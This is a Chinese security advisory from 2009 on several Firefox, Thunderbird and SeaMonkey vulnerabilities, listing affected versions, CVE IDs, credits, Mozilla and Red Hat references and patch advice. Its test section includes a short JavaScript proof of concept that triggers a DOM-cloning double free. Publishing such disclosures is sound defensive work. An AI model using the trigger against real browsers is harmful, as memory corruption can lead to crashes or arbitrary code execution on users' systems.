Firefox 3.0.7更新修复多个漏洞
来源:岁月联盟
时间:2009-03-15
更新日期:2009-03-05
受影响系统:
Mozilla Firefox < 3.0.7
Mozilla Thunderbird < 2.0.0.21
Mozilla SeaMonkey < 1.1.15
不受影响系统:
Mozilla Firefox 3.0.7
Mozilla Thunderbird 2.0.0.21
Mozilla SeaMonkey 1.1.15
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 33990
CVE(CAN) ID: CVE-2009-0771,CVE-2009-0772,CVE-2009-0773,CVE-2009-0774,CVE-2009-0775,CVE-2009-0777CVE-2009-0776
Firefox是Mozilla所发布的开源WEB浏览器。
Firefox中的多个安全漏洞允许恶意用户泄露敏感信息、绕过安全限制或安全用户系统。由于代码共享,Thunderbird和SeaMonkey也受这些漏洞的影响。
1) 布局引擎和Javascript引擎中的错误可能导致内存破坏并执行任意代码。
2) 浏览器垃圾收集进程存在错误。在克隆多个DOM元素时,如果这些元素彼此链接,则重载浏览器就会触发内存破坏,导致双重释放。
3) 站点可以使用nsIRDFService和跨域重新定向破坏同源策略从其他域窃取任意XML数据。
4) 在地址栏中显示的时候可能会解码某些不可视的控制字符,导致显示的可视字符比实际的字符少。安全者可以利用这个漏洞伪造地址栏,显示误导性的URL。
<*来源:Georgi Guninski (guninski@guninski.com)
Jesse Ruderman (jruderman@gmail.com)
Josh Soref
链接:http://www.mozilla.org/security/announce/2009/mfsa2009-11.html
http://www.mozilla.org/security/announce/2009/mfsa2009-09.html
http://www.mozilla.org/security/announce/2009/mfsa2009-08.html
http://www.mozilla.org/security/announce/2009/mfsa2009-07.html
https://www.redhat.com/support/errata/RHSA-2009-0315.html
https://www.redhat.com/support/errata/RHSA-2009-0325.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
body = document.getElementById(’mainbody’);
noti = document.createElementNS(xulns,’notification’);
body.appendChild(noti);
elem = document.createElement("div");
statusbar = document.createElementNS(xulns,’statusbarpanel’);
clone = statusbar.cloneNode(1);
elem.appendChild(clone);
for(var x=0;x<10;x++) hs();
location.reload()
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mozilla.org/
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2009:0325-01)以及相应补丁:
RHSA-2009:0325-01:Critical: seamonkey security update
链接:https://www.redhat.com/support/errata/RHSA-2009-0325.html